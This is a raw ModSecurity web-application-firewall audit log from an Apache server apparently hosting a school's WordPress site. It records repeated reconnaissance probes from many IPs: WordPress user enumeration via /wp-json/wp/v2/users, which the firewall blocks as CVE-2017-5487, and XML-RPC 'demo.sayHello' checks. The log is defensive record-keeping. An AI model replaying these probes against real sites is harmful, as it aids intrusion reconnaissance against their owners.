Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c62b1956-Z-- --b8350e6f-A-- [10/May/2025:06:53:02 +0700] aB6VXquC4AqLGUOyzyX6VAAAAIE 103.236.140.4 49494 103.236.140.4 8181 --b8350e6f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.179.230 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.179.230 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b8350e6f-C-- demo.sayHello --b8350e6f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b8350e6f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746834782299246 6769 (- - -) Stopwatch2: 1746834782299246 6769; combined=4799, p1=851, p2=3704, p3=38, p4=43, p5=97, sr=101, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b8350e6f-Z-- --b6f59729-A-- [10/May/2025:07:00:29 +0700] aB6XHdr9PbfRBMhzxmRZxAAAAEU 103.236.140.4 51198 103.236.140.4 8181 --b6f59729-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.166.27 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.166.27 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b6f59729-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b6f59729-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746835229687816 3077 (- - -) Stopwatch2: 1746835229687816 3077; combined=1301, p1=447, p2=824, p3=0, p4=0, p5=29, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b6f59729-Z-- --f9b37263-A-- [10/May/2025:07:00:33 +0700] aB6XIdr9PbfRBMhzxmRZxgAAAEc 103.236.140.4 51202 103.236.140.4 8181 --f9b37263-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.166.27 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.166.27 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f9b37263-C-- demo.sayHello --f9b37263-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f9b37263-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746835233797787 5517 (- - -) Stopwatch2: 1746835233797787 5517; combined=4072, p1=531, p2=3303, p3=28, p4=32, p5=103, sr=72, sw=75, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f9b37263-Z-- --dbc90769-A-- [10/May/2025:07:13:38 +0700] aB6aMsi6w7GTj2w44Z6a8gAAAMs 103.236.140.4 51274 103.236.140.4 8181 --dbc90769-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 196.216.70.210 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 196.216.70.210 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --dbc90769-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dbc90769-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746836018551924 3160 (- - -) Stopwatch2: 1746836018551924 3160; combined=1363, p1=474, p2=860, p3=0, p4=0, p5=29, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dbc90769-Z-- --90163a31-A-- [10/May/2025:07:23:07 +0700] aB6ca6uC4AqLGUOyzyX7MwAAAJU 103.236.140.4 51342 103.236.140.4 8181 --90163a31-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.176.49 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.176.49 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --90163a31-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --90163a31-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746836587678535 3523 (- - -) Stopwatch2: 1746836587678535 3523; combined=1563, p1=541, p2=985, p3=0, p4=0, p5=36, sr=129, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --90163a31-Z-- --bcc51d0c-A-- [10/May/2025:07:23:13 +0700] aB6ccRLuBiaF9R054QBZVwAAAAg 103.236.140.4 51346 103.236.140.4 8181 --bcc51d0c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.176.49 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.176.49 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --bcc51d0c-C-- demo.sayHello --bcc51d0c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --bcc51d0c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746836593453614 4916 (- - -) Stopwatch2: 1746836593453614 4916; combined=3813, p1=469, p2=3145, p3=23, p4=26, p5=88, sr=67, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bcc51d0c-Z-- --1c431c06-A-- [10/May/2025:07:23:20 +0700] aB6ceNr9PbfRBMhzxmRZ2wAAAFg 103.236.140.4 51350 103.236.140.4 8181 --1c431c06-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.177.49 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.177.49 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1c431c06-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c431c06-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746836600098761 3150 (- - -) Stopwatch2: 1746836600098761 3150; combined=1401, p1=505, p2=866, p3=0, p4=0, p5=30, sr=128, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c431c06-Z-- --6171a96a-A-- [10/May/2025:07:23:26 +0700] aB6cfquC4AqLGUOyzyX7NAAAAJc 103.236.140.4 51354 103.236.140.4 8181 --6171a96a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.177.49 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.177.49 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6171a96a-C-- demo.sayHello --6171a96a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6171a96a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746836606701090 6646 (- - -) Stopwatch2: 1746836606701090 6646; combined=4706, p1=664, p2=3786, p3=61, p4=36, p5=94, sr=121, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6171a96a-Z-- --aa23d763-A-- [10/May/2025:07:23:27 +0700] aB6cf9r9PbfRBMhzxmRZ3QAAAEI 103.236.140.4 51356 103.236.140.4 8181 --aa23d763-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.106.115 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.106.115 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --aa23d763-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aa23d763-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746836607549933 2510 (- - -) Stopwatch2: 1746836607549933 2510; combined=1153, p1=419, p2=705, p3=0, p4=0, p5=29, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aa23d763-Z-- --b132314a-A-- [10/May/2025:07:23:29 +0700] aB6cgRLuBiaF9R054QBZWAAAAAc 103.236.140.4 51362 103.236.140.4 8181 --b132314a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.91.243 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.91.243 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b132314a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b132314a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746836609545307 2367 (- - -) Stopwatch2: 1746836609545307 2367; combined=1059, p1=386, p2=647, p3=0, p4=0, p5=26, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b132314a-Z-- --94732c1b-A-- [10/May/2025:07:23:30 +0700] aB6cgsi6w7GTj2w44Z6a_AAAAMk 103.236.140.4 51364 103.236.140.4 8181 --94732c1b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.106.115 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.106.115 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --94732c1b-C-- demo.sayHello --94732c1b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --94732c1b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746836610625154 4723 (- - -) Stopwatch2: 1746836610625154 4723; combined=3685, p1=442, p2=3040, p3=25, p4=27, p5=89, sr=66, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --94732c1b-Z-- --43efac47-A-- [10/May/2025:07:23:33 +0700] aB6chRLuBiaF9R054QBZWwAAABA 103.236.140.4 51372 103.236.140.4 8181 --43efac47-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.91.243 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.91.243 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --43efac47-C-- demo.sayHello --43efac47-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --43efac47-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746836613815795 5031 (- - -) Stopwatch2: 1746836613815795 5031; combined=3871, p1=451, p2=3205, p3=23, p4=24, p5=98, sr=65, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --43efac47-Z-- --f3003a71-A-- [10/May/2025:07:23:44 +0700] aB6ckNr9PbfRBMhzxmRZ4AAAAEY 103.236.140.4 51380 103.236.140.4 8181 --f3003a71-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.240.99.23 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.240.99.23 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f3003a71-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f3003a71-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746836624186713 2835 (- - -) Stopwatch2: 1746836624186713 2835; combined=1226, p1=388, p2=803, p3=0, p4=0, p5=34, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f3003a71-Z-- --76fe670b-A-- [10/May/2025:07:23:44 +0700] aB6ckKuC4AqLGUOyzyX7NgAAAIA 103.236.140.4 51382 103.236.140.4 8181 --76fe670b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.167.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.167.101 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --76fe670b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --76fe670b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746836624359471 2000 (- - -) Stopwatch2: 1746836624359471 2000; combined=937, p1=323, p2=587, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --76fe670b-Z-- --59cde170-A-- [10/May/2025:07:23:47 +0700] aB6ck9r9PbfRBMhzxmRZ4QAAAEU 103.236.140.4 51390 103.236.140.4 8181 --59cde170-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.240.99.23 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.240.99.23 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --59cde170-C-- demo.sayHello --59cde170-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --59cde170-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746836627940108 6125 (- - -) Stopwatch2: 1746836627940108 6125; combined=4409, p1=564, p2=3617, p3=33, p4=33, p5=94, sr=79, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --59cde170-Z-- --d733a07b-A-- [10/May/2025:07:23:47 +0700] aB6ckxLuBiaF9R054QBZXwAAABQ 103.236.140.4 51392 103.236.140.4 8181 --d733a07b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.167.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.167.101 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d733a07b-C-- demo.sayHello --d733a07b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d733a07b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746836627946197 4762 (- - -) Stopwatch2: 1746836627946197 4762; combined=3600, p1=459, p2=2931, p3=25, p4=24, p5=93, sr=76, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d733a07b-Z-- --3ef78728-A-- [10/May/2025:07:23:55 +0700] aB6cmxLuBiaF9R054QBZYQAAABc 103.236.140.4 51398 103.236.140.4 8181 --3ef78728-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.114.39 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.114.39 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3ef78728-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3ef78728-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s 